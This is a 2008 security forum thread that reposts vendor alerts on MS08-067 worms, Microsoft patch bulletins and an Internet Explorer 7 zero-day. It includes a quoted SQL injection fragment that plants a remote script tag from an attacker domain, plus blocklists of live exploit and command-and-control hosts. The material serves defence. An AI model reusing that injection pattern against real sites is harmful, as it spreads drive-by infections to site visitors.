Old MS Alerts

MS08-067 worm in the wild

FYI...

Worm Exploiting MS08-067 in the Wild
- http://www.f-secure.com/weblog/archives/00001526.html
November 3, 2008 - "Code building on the proof of concept binaries that were mentioned last week has moved into the wild. We've received the first reports of a worm capable of exploiting the MS08-067 vulnerability. The exploit payload downloads a dropper that we detect as Trojan-Dropper.Win32.Agent.yhi. The dropped components include a kernel mode DDOS-bot that currently has a selection of Chinese targets in its configuration. The worm component is detected as Exploit.Win32.MS08-067.g and the kernel component as Rootkit.Win32.KernelBot.dg."

Also see: http://isc.sans.org/diary.html?storyid=5275
Last Updated: 2008-11-03 18:54:56 UTC ...(Version: 3)

:fear:
 
Last edited:
MSRT 2008-H1 - 43 percent increase in malware

FYI...

- http://www.theregister.co.uk/2008/11/03/microsoft_intelligence_report/
3 November 2008 - "Malware and unwanted software made strides in the first half of 2008, according to the latest security intelligence report from Microsoft, which tallied a 43 percent increase in the number of programs exorcised by the the company's malicious software removal tool. In the first six months of this year, there were some 62 million disinfections on 23.8 million machines, according to the report which was published* Monday. In the second half of last year, 42 million programs were removed on 15 million computers. Because it runs on hundreds of millions of machines worldwide, Microsoft's MSRT, or malicious software removal tool, functions as something of a bellwether for the state of successful attacks affecting Windows computers. The increase was driven in part by the addition of new strains of malware that the MSRT checks for, said Jeff Williams, principal architect for the Microsoft Malware Protection Center. Win32/Taterf, a family of worms that steals login credentials for a host of online games, was one such addition and was removed 2.7 million times. Other causes included the growing aggressiveness of established malware families. Win32/Zlob, a trojan that has bedeviled Windows users for years, was removed 7.5 million times..."
* http://www.microsoft.com/sir

:fear:
 
MS08-067 worm in the wild...

More detail...

- http://asert.arbornetworks.com/2008/11/ms08-067-used-to-drop-ddos-bots/
November 3, 2008 - "...The exploit code is 67.exe, and the bot itself is 6767.exe. KernelBot is a Chinese origin DDoS bot... We first became aware of this bot during the CNN.Com attacks earlier this year... If you want to stop this one, you should block all web access to the domain ushealthmart .com. It’s using a few hosts under that domain name to spread and send out configurations... KernelBot can send ICMP, TCP SYN, UDP, and even HTTP flood attacks, among others. It communicates with a server to retrieve the file, usually named “cmd.txt”, which itself is a large INI file describing attacks and next actions..."

- http://isc.sans.org/diary.html?storyid=5288
Last Updated: 2008-11-05 02:53:31 UTC - "...exploiting ip 61.218.147.66. That IP is definitely sequentially scanning ip addresses for tcp 445 looking for vulnerable systems so blocking it at your enterprise gateway is recommended."

:fear:
 
Last edited:
MS Bulletin Advance Notification - November 2008

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-nov.mspx
November 6, 2008 - "This is an advance notification of security bulletins that Microsoft is intending to release on November 11, 2008... (Total of -2-)

Critical (1)

Windows Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Microsoft Office...

Important (1)

Windows Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows..."
 
Hacker tool targeting MS08-067 vuln

FYI...

Hacker tool targeting MS08-067 vuln
- http://securitylabs.websense.com/content/Blogs/3237.aspx
11.11.2008 - "Websense... has noticed a special hacker tool in China. In the past few weeks, Microsoft has announced and released a patch for the MS08-067 vulnerability, and a hacker tool named "wolfteeth bot catcher" has been widely used by hackers to attack machines running Windows operating systems -without- the KB958644 patch... First, the tool drops and runs a backdoor named bycnboy.exe, which moves itself to the system folder and is renamed to windef.exe. This means that hackers who used this tool were themselves hacked by the tool's author. Then a file named project.exe is placed in the temp folder and loaded to run once the original file has finished its job... a Trojan file from the user-defined Web site could be downloaded and executed. All the vulnerable IPs are controlled remotely..."

(Screenshots and more detail available at the URL above.)

:fear:
 
MS Security Bulletin Summary - November 2008

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-nov.mspx
November 11, 2008 - "This bulletin summary lists security bulletins released for November 2008... (Total of -2-)

Critical (1)

Microsoft Security Bulletin MS08-069
Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218)
- http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Important (1)

Microsoft Security Bulletin MS08-068
Vulnerability in SMB Could Allow Remote Code Execution (957097)
- http://www.microsoft.com/technet/security/bulletin/ms08-068.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Microsoft Windows...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5330
Last Updated: 2008-11-11 18:28:39 UTC
 
MS08-067 exploits in the wild increase

FYI...

- http://blogs.technet.com/mmpc/archive/2008/11/25/more-ms08-067-exploits.aspx
November 25, 2008 5:37 PM - "As expected, we are seeing another wave of attacks exploiting the vulnerability detailed in security bulletin MS08-067. Early last week... the number of exploits in the wild was still low and they were mostly targeted attacks. However, during the weekend we started receiving customer reports for new malware that exploits this vulnerability. During the last two days that malware gained momentum and as a result we see an increased support call volume... This malware mostly spreads within corporations but also was reported by several hundred home users. It opens a random port between port 1024 and 10000 and acts like a web server. It propagates to random computers on the network by exploiting MS08-067. Once the remote computer is exploited, that computer will download a copy of the worm via HTTP using the random port opened by the worm. The worm often uses a .JPG extension when copied over and then it is saved to the local system folder as a random named dll. It is also interesting to note that the worm patches the vulnerable API in memory so the machine will not be vulnerable anymore... We have also found several bots that exploit MS08-067... We continue to urge all our customers to install MS08-067*..."
* http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
CVSS v2 Base Score: 10.0 (HIGH)...
Impact Type: Provides administrator access, Allows complete confidentiality, integrity, and availability violation; Allows unauthorized disclosure of information; Allows disruption of service...
- http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm:Win32/Conficker.A
"...Microsoft strongly recommends that users apply the update referred to in Security Bulletin MS08-067 immediately..."

:fear::fear:
 
Last edited:
MS08-067 vuln - 500,000 victims

FYI...

- http://blog.trendmicro.com/downad-gearing-up-for-a-botnet/
Nov. 30, 2008 - "A few days ago, Trend Micro got wind of a .DLL worm detected as WORM_DOWNAD.A that exploits the MS08-067 vulnerability. Its routines have lead our security analysts to postulate that it is a key component in the development of a new botnet. Initially thought to be working in conjunction with a NETWORM variant, WORM_DOWNAD.A is now believed to be an updated version of an attack from the same criminal botnet gang. Fresh reports, however, suggest that this threat seems to have gone wider and has even extended its reach around the globe. More than 500,000 unique hosts have since been discovered to have fallen victim to this threat. These infected hosts are spread across different countries and as a random check by Trend Micro... revealed, they can be found in service provider networks in the U.S., China, India, the Middle East, Europe, and Latin America — several residential broadband providers appear to have a larger number of infected customers..."

:fear::mad::fear:
 
MS Security Bulletin Advance Notification - December 2008

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
December 4, 2008
"This is an advance notification of security bulletins that Microsoft is intending to release on December 9, 2008... (Total of - 8 -)

Bulletin ID - Maximum Severity Rating and Vulnerability Impact - Restart Requirement - Affected Software

(Critical - 6)
Windows 1 - Critical - Remote Code Execution - Requires restart - Microsoft Windows
Windows 2 - Critical - Remote Code Execution - Requires restart - Microsoft Windows
IE - Critical - Remote Code Execution - Requires restart - Microsoft Windows, Internet Explorer
VB - Critical - Remote Code Execution - Requires restart - Microsoft Developer Tools and Software, Microsoft Office
Word - Critical - Remote Code Execution - Does not require restart - Microsoft Office
Excel - Critical - Remote Code Execution - Does not require restart - Microsoft Office
____

(Important- 2)
SharePoint- Important- Elevation of Privilege- Does not require restart - Microsoft Office, Microsoft Server Software
WMC - Important- Remote Code Execution - May require restart - Microsoft Windows
...

- http://www.us-cert.gov/current/#microsoft_releases_advanced_notification_for2
December 5, 2008 at 09:53 am - "... the December release cycle will contain eight bulletins, six of which will have a severity rating of Critical. The notification states that these Critical bulletins are for Microsoft Windows, Internet Explorer, and Office. There will also be two Important bulletins for Microsoft Windows and Office.."
 
Last edited:
FYI...

Microsoft Security Advisory (960906)
Vulnerability in WordPad Text Converter Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/960906.mspx
Published: December 9, 2008 - "Microsoft is investigating new reports of a vulnerability in the WordPad Text Converter for Word 97 files on Windows 2000 Service Pack 4, Windows XP Service Pack 2, Windows Server 2003 Service Pack 1, and Windows Server 2003 Service Pack 2. Windows XP Service Pack 3, Windows Vista, and Windows Server 2008 are -not- affected as these operating systems do not contain the vulnerable code. Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through a service pack, our monthly security update release process, or an out-of-cycle security update, depending on customer needs. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability..."

- http://isc.sans.org/diary.html?storyid=5461
Last Updated: 2008-12-10 11:38:37 UTC

- http://blog.trendmicro.com/a-wordpad-of-caution/
Dec. 15, 2008 - "...The exploit works by using a specially-crafted .DOC, .WRI, or .RTF file to take advantage of the WordPad vulnerability, thereby causing the said application to crash. This crash may then allow a remote malicious user to take control of an affected system..."

- http://www.microsoft.com/technet/security/advisory/960906.mspx
• December 15, 2008: Updated the workaround, Disable the WordPad Text Converter for Word 97.

:fear:
 
Last edited:
MS Security Bulletin Summary - December 2008

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
Published: December 9, 2008 - "This bulletin summary lists security bulletins released for December 2008... security bulletins for this month in order of severity... ( Total of - 8 - )

Critical (6)

Microsoft Security Bulletin MS08-071
Vulnerabilities in GDI Could Allow Remote Code Execution (956802)
- http://www.microsoft.com/technet/security/Bulletin/ms08-071.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-075
Vulnerabilities in Windows Search Could Allow Remote Code Execution (959349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-075.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-073
Cumulative Security Update for Internet Explorer (958215)
- http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx
Severity Rating: Critical
Affected Software: Microsoft Windows, Internet Explorer...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-070
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
Severity Rating: Critical
Affected Software: Microsoft Developer Tools and Software, Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-072
Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173)
- http://www.microsoft.com/technet/security/bulletin/ms08-072.mspx
Severity Rating: Critical
Affected Software: Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Microsoft Security Bulletin MS08-074
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070)
- http://www.microsoft.com/technet/security/bulletin/ms08-074.mspx
Severity Rating: Critical
Affected Software: Microsoft Office...
Vulnerability Impact: Remote Code Execution...

Important (2)

Microsoft Security Bulletin MS08-077
Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175)
- http://www.microsoft.com/technet/security/bulletin/ms08-077.mspx
Severity Rating: Important
Affected Software: Microsoft Office, Microsoft Server Software...
Vulnerability Impact: Elevation of Privilege...

Microsoft Security Bulletin MS08-076
Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807)
- http://www.microsoft.com/technet/security/bulletin/ms08-076.mspx
Severity Rating: Important
Affected Software: Microsoft Windows...
Vulnerability Impact: Remote Code Execution...
_____

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5449
Last Updated: 2008-12-09 20:36:04 UTC
_____

- http://preview.tinyurl.com/5oqpcj
December 9, 2008 (Computerworld) - "(MS)... patched 28 vulnerabilities... the biggest batch of fixes it has issued since it switched to a regular monthly update schedule more than five years ago. Of the 28 bugs quashed today, Microsoft ranked 23 of them critical..."

:fear:
 
Last edited:
IEv7 0-day exploit in the wild...

FYI...

IE XML processing memory corruption
- http://secunia.com/advisories/33089/
Release Date: 2008-12-10
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: Microsoft Internet Explorer 7.x...
...Successful exploitation allows execution of arbitrary code.
NOTE: Reportedly, the vulnerability is currently being actively exploited.
The vulnerability is confirmed in Internet Explorer 7 on a fully patched Windows XP SP3. Other versions may also be affected.
Solution: Do not browse untrusted websites or follow untrusted links.
Provided and/or discovered by: Reported as a 0-day...

- http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-10 09:38:03 UTC

- https://forums.symantec.com/syment/blog/article?blog.id=vulnerabilities_exploits&message.id=180#M180
12-10-2008 - "...We also recommend blocking the following hosts at network boundaries:
• wwwwyyyyy.cn
• sllwrnm5.cn
• baikec.cn
• oiuytr.net *
• laoyang4.cn
• cc4y7.cn ..."

* example: https://safeweb.norton.com/report/show?name=oiuytr.net

:fear::fear:
 
Last edited:
IEv7 0-day vuln...

FYI...

- http://securitylabs.websense.com/content/Alerts/3259.aspx
12.10.2008 - "...No user interaction is necessary for the exploit to be successful. A computer may become infected by simply visiting a malicious Web site. This vulnerability exists in the way XML is processed within Internet Explorer 7..."

- http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-11 09:50:54 UTC ...(Version: 3) - "...Update: Microsoft published a bulletin regarding this issue*... In addition, shadowserver.org published a list of infected sites**. Note that this list may not be complete. The best mitigating action from the bulletin is probably to enable DEP for Internet Explorer 7...

* http://www.microsoft.com/technet/security/advisory/961051.mspx
December 10, 2008 - "...Suggested Actions... Workarounds:
Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors...
• Set Internet and Local intranet security zone settings to "High" to prompt before running ActiveX Controls and Active Scripting in these zones...
• Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone...
• Enable DEP for Internet 7...

IE7 0-Day Exploit Sites
** http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
10 December 2008 - "...the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not stop completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved..."

> http://isc.sans.org/diary.html?storyid=5458
Last Updated: 2008-12-11 09:50:54 UTC ...(Version: 3) - "...UPDATE 2: ...we received log files showing that attackers using SQL injection are now. The SQL Injection attacks are similar to those we've described multiple times before (see http://isc.sans.org/diary.html?storyid=4565 , for example). The important part includes the target URL that is injected:
… rtrim(convert(varchar(4000),['+@C+']))+''<script src=http ://17gamo [dot] com/1.js></script>''')FETCH NEXT FROM …
This domain is not listed by Shadowserver yet. The 1.js script on the domain links to multiple other HTML documents of which one is called ie7.htm ... If executed successfully, the script will download the binary from http ://www [dot] steoo [dot] com/admin/win.exe. This is a game password stealer which has sporadic detection ( http://www.virustotal.com/analisis/244ae03fed5b32d999c50b614fddde6a ) – there are some big names still missing it. In any case, the attackers are picking this quickly so make sure that you are following recommendations from Microsoft's advisory which will help reduce exposure or, if you can, use an alternative browser until this has been fixed."

_____

- http://securitylabs.websense.com/content/Alerts/3260.aspx
12.11.2008 - "Websense... has discovered that the Taiwanese search engine "look.tw" has been compromised and is infecting site visitors with malicious code. The Web site has been injected with a recently announced Internet Explorer 7 Zero Day Attack ( http://securitylabs.websense.com/content/Alerts/3259.aspx ). The exploit on the site attempts to download a malicious excutable called "ieupdate.exe". The download location is currently down, but could come back at any moment."

:fear::fear::mad::mad:
 
Last edited:
FYI...

Microsoft Security Advisory (961051)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961051.mspx
Revisions:
• December 10, 2008: Advisory published
• December 11, 2008: Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds...
- Workarounds...
• Use ACL to disable OLEDB32.DLL...
• Unregister OLEDB32.DLL...
• Disable Data Binding support in Internet Explorer 8...

• December 15, 2008: Updated the workarounds, Disable XML Island functionality and Disable Row Position functionality of OLEDB32.dll.
...Registry Editor...

- http://support.microsoft.com/kb/961051
Last Review: December 14, 2008 - Revision: 3.0

:fear: :lip:
 
Last edited:
IE 0day - status updates...

FYI...

MSIE 0-day Spreading Via SQL Injection
- http://isc.sans.org/diary.html?storyid=5464
Last Updated: 2008-12-12 01:00:18 UTC

Full list of Injected Sites
- http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Last Updated: 12/11/08 12:05:32 -0400

IE7 0day expanded to include IE6 and IE8(beta)
- http://isc.sans.org/diary.html?storyid=5470
Last Updated: 2008-12-12 01:26:35 UTC

- http://securitylabs.websense.com/content/alerts.aspx
Date Description
12.12.2008 - ABIT China Web site Attacked by IE7 Zero Day
12.11.2008 - Taiwanese Search Engine, Look, Infected with IE 7 Zero Day

:fear::fear:
 
Last edited:
IE7 0-Day Exploit Gets Worse

Blocks...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081211
11 December 2008 - "...It turns out the domain that ISC is reported on is also dropping some pretty nasty malware. The domain "17gamo .com" is serving up the exploits which attempt to download malware from "www .steoo .com". Please do not visit either of these sites. If successful the exploits will install a Gh0st RAT on the system. This trojan is currently using the DNS name "evetlog .3322 .org" and is beaconing to tcp port 3020.
We recommend blocking or looking for traffic to all of the sites we list*... but in particular as it related to this threat the following:
www .17gamo .com - 207.154.202.219
www .steoo .com - 97.74.35.98
evetlog .3322 .org - 218.9.170.106 (was recently 123.165.49.135]
The IP addresses are of course subject to change, so we recommend resolving them when appropriate for traffic monitoring/blocking...."
* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/12/2008 - 14:17 UTC/GMT

:fear::fear:
 
IE7 0-Day Exploit Sites - updated...

FYI...

IE7 0-Day Exploit Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
"...Shadowserver is aware of several hosts which are currently hosting exploit code designed to exploit this vulnerability. We would like to share this information so that it can be used for protection and detection. However, we strongly discourage visiting these sites for any reason. DO NOT visit the below sites as they are currently house live exploit code for the new IE7 0day exploit. The majority if not all of them also house several other exploits for different vulnerabilities as well...
vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75
...the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not stop completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved..."
Page last modified on December 14, 2008, at 01:13 AM <<<

:fear::fear:
 
FYI...

IE7 0-Day Exploit Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/14/2008 - 18:26 UTC/GMT:
( additions - Shadowserver recommended blocklist updates )
buxhere .com - 203.169.184.78 / [country: HK]

Updated 12/15/2008 - 04:17 UTC/GMT
517wyt .com - 66.90.67.98 / [country: US]

Highly recommended that you NOT visit these sites. "The majority if not all of them also house several other exploits for different vulnerabilities as well"...

:fear:
 
Last edited:
Shadowserver IEv7 0-day exploit sites...

FYI... Shadowserver IEv7 0-day exploit sites / recommended blocklist sites...
Please do not visit -any- of these sites. The majority if not all of them also house several other exploits for different vulnerabilities as well...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081211
11 December 2008 - "...We recommend blocking or looking for traffic to all of the sites we list*... but in particular as it related to this threat the following:
www .17gamo .com - 207.154.202.219 *seen from SQL injection attacks*
www .steoo .com - 97.74.35.98
evetlog .3322 .org - 218.9.170.106 ..."

* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/16/2008 - 13:09 UTC/GMT

vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75

Updated 12/14/2008 - 18:26 UTC/GMT:
buxhere .com - 203.169.184.78 / [country: HK]

Updated 12/15/2008 - 04:17 UTC/GMT
517wyt .com - 66.90.67.98 / [country: US]

(Keep checking the Shadowserver URLs frequently for new updates)

:fear::fear::fear:
 
Last edited:
IE patch tomorrow...

FYI...

- http://isc.sans.org/diary.html?storyid=5497
Last Updated: 2008-12-16 20:23:07 UTC - "Microsoft has announced that they will be releasing an out of cycle security bulletin tomorrow for the IE zero day*..."
* http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
December 16, 2008 - "...This bulletin advance notification will be replaced with the revised December bulletin summary on December 17, 2008. The revised bulletin summary will include the out-of-band security bulletin...
Bulletin Identifier: IE ...
Aggregate Severity Rating: Critical ..."

:fear:
 
You must log in or register to reply here.
Back
Top